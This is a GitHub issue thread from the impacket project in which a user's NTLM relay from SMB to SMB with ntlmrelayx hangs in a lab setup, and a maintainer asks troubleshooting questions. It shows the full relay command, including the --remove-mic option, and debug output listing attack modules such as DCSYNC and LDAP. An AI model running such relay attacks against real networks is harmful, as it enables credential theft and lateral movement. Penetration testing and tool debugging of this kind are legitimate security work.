### ISSUE TITLE
Getting stuck when trying to relay SMB->SMB

### ISSUE THREAD

**Issue by Bixilon** [SecureAuthCorp/impacket#1248]
Hi there,
I am trying to forward a request to metasploit server (`use auxiliary/server/capture/smb`). This server (target) can also be a windows machine. I am attacking with (`winexe -U=Administrator //127.0.0.1 cmd`; also tried to access a samba share). The problem is, that pretty much nothing happens. When I add `-smb2support` the authentication request gets shown, but still nothing happens (see the log and the packet dump below)

### Configuration  
impacket version:  0.9.24
Python version:  3.9
Target OS:  Ubuntu/Windows

### Debug Output With Command String  
```
moritz@moritz-tp$ sudo python3 ntlmrelayx.py -smb2support --no-http-server --no-wcf-server -debug -t 10.110.138.39 --remove-mic
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Protocol Client RPC loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[+] Protocol Attack RPC loaded..
[+] Protocol Attack MSSQL loaded..
[+] Protocol Attack IMAP loaded..
[+] Protocol Attack IMAPS loaded..
[+] Protocol Attack DCSYNC loaded..
[+] Protocol Attack SMB loaded..
[+] Protocol Attack HTTP loaded..
[+] Protocol Attack HTTPS loaded..
[+] Protocol Attack LDAP loaded..
[+] Protocol Attack LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server

[*] Servers started, waiting for connections
[*] SMBD-Thread-2: Connection from WORKGROUP/ADMINISTRATOR@127.0.0.1 controlled, attacking target smb://10.110.138.39
```

`10.110.138.39` is the target (in this case the metasploit server or the windows vm).  
`10.110.138.1` is the relay and the attacker

### PCAP  
![Screenshot_20220131_205502](https://user-images.githubusercontent.com/26258520/151863366-e184e15e-962d-4dd2-9772-74bc20e30d86.png)

[pcapng.zip](https://github.com/SecureAuthCorp/impacket/files/7973831/pcapng.zip) (Sorry, github does not allow uploading .pcapng files)

Is this a bug or am I doing something wrong?

**Comment by 0xdeaddood** [comment]
Hi @Bixilon!

I've tried to replicate your scenario and I have a couple of questions for you to review. 

- The `Connection from xxx/xxx@xxx controlled, attacking...` message is displayed once the `TREE_CONNECT` message is sent. We should see that exchange in your capture. Is that PCAP complete? 

- I saw during my tests that `winexe` finishes the connection after receives the `NT_STATUS_NETWORK_SESSION_EXPIRED`. That is before the credentials are sent, so you won't be able to relay them to the target. Do you get any message on the `winexe` side? If you are getting the same message, you'll have to use another way to connect to the attacker machine.

**Comment by 0xdeaddood** [comment]
No answer, closing. Reopen if needed.
